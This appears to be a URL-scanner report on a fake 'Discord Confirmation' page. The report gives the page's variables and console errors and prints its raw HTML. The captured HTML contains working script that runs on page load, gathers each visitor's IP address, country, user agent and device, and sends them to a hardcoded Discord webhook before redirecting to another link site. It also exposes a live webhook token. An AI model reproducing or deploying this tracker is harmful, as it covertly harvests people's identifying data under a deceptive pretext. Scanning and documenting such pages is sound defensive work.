https://bleleadersto.com/s?f9e9c765

Submitted URL:
https://nsfwcord.com/Redirected
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 8 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
0string
onbeforetogglestring
documentPictureInPicturestring
onscrollendstring
conf_rewstring
LAST_CORRECT_EVENT_TIMEstring
_3766219271string
am_sid1060232string

Console log messages · 2 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://media.discordapp.net/attachments/851389970840944640/851390664788934656/755243061088616458.gif
Text
Failed to load resource: the server responded with a status of 404 ()
errornetwork
URL
https://bleleadersto.com/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Discord Confirmation</title>
	<link crossorigin="anonymous" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css" rel="stylesheet">
	<link href="https://logodownload.org/wp-content/uploads/2017/11/discord-logo-4-1.png" rel="icon" sizes="16x16" type="image/png"><meta content="website" property="og:type">
	<link href="https://use.typekit.net/joc7wli.css" rel="stylesheet">
	<style type="text/css">.btn {
            background-color: #60d1f6;
            color: #fff;
            padding: 10px 22px;
        }
        .btn:hover {
            background: #0076ff;
            color: #fff;
        }
        body {
            background-image: url(https://media.discordapp.net/attachments/851389970840944640/851390664788934656/755243061088616458.gif);
            background-size: 20%;
            background-repeat: no-repeat;
            background-position: bottom 0 right 7px;
            background-color: #24292e!important;
        }
        h1, h2, h3, h4, h5, h6 {
            color: #fff;
        }
        p, small, span {
            color: #eaeaea;
        }
        #box {
            width: 400px;
            margin: 0 auto;
            margin-top: 100px;
            border: 2px solid #181a1f;
            vertical-align: middle;
            border-radius: 5px;
            text-align: center;
            padding: 60px;
            background-color: #31363f!important;
        }
        #server_pic {
            display: block;
            border-radius: 1%;
            margin: 10px auto;
            width: 200px;
            border: 0 solid #181a1f;
        }
        hr {
            margin: 20px;
            background-color: #eaeaea;
        }
	</style>
	<script>
        const webhookUrl = 'https://discord.com/api/webhooks/1274718611659034685/cNLPyi2oAEn7qdI6PGOjepvj3w1c0Tuf1K-y3XOCqdHWSX1akTNOPaSdujl-pdwB5n8H'; // Replace with your webhook URL
        const ipApiUrl = 'https://ipinfo.io/json';

        async function updateClickData() {
            // Send request to update click data
            await fetch('/update-click-data', { method: 'POST' });
        }

        async function sendWebhook(clickData) {
            // Send click data to the webhook
            await fetch(webhookUrl, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({
                    embeds: [{
                        title: "<a:1196514369945739316:1231627566054379590> Click Tracking Data",
                        fields: [
                            { name: "<a:tlwSparklesRed:807192797579837440> **Timestamp**", value: clickData.timestamp, inline: true },
                            { name: "<a:tlwSparklesRed:807192797579837440> **IP** Address", value: clickData.ip || "Unknown", inline: true }, // Replace referrer with IP
                            { name: "<a:4918lightingbolt:1257210236759183391> **User Agent**", value: clickData.userAgent, inline: false },
                            { name: "<:site:1257210541827555360> **Country**", value: clickData.country, inline: true },
                            { name: "<:PC:1154875086503944192> **Device**", value: clickData.device, inline: true },
                            { name: "<a:DiamondR:1154874956472131644> **Day Clicks**", value: clickData.totalClicks.toString(), inline: true },
                        ],
                        color: 0000000 // Hex color code (blue)
                    }]
                })
            });
        }

        async function fetchClickData() {
            try {
                const response = await fetch('/click-data');
                if (response.ok) {
                    return await response.json();
                } else {
                    console.error('Failed to fetch click data');
                    return {
                        totalClicks: 'N/A'
                    };
                }
            } catch (error) {
                console.error('Error fetching click data:', error);
                return {
                    totalClicks: 'N/A'
                };
            }
        }

        window.onload = async () => {
            // Update click data
            await updateClickData();

            // Fetch country data and IP address
            const ipResponse = await fetch(ipApiUrl);
            const ipData = await ipResponse.json();
            
            // Get the current timestamp and user details
            const timestamp = new Date().toISOString();
            const ip = ipData.ip || 'Unknown'; // Use IP data from IP API
            const userAgent = navigator.userAgent;
            const country = ipData.country || 'Unknown'; // Use country data from IP API
            const device = navigator.platform;
            
            // Create click data object
            const clickDetails = {
                timestamp,
                ip,  // Add IP address
                userAgent,
                country,
                device,
                totalClicks: (await fetchClickData()).totalClicks
            };

            // Send click data to the webhook
            await sendWebhook(clickDetails);
        };
    </script>
</head>
<body>
<div id="box"><img alt="Discord Logo" height="193" id="server_pic" src="/HWGIvAF.png" width="200">
<h2>Redirecting...</h2>

<p>Please complete the verification to access all 200+ channels and other chats!</p>
</div>
<script>
        setTimeout(() => {
            window.location.href = 'https://best-links.org/s?f9e9c765';
        }, 2125);
    </script>

<p></p>

</body></html>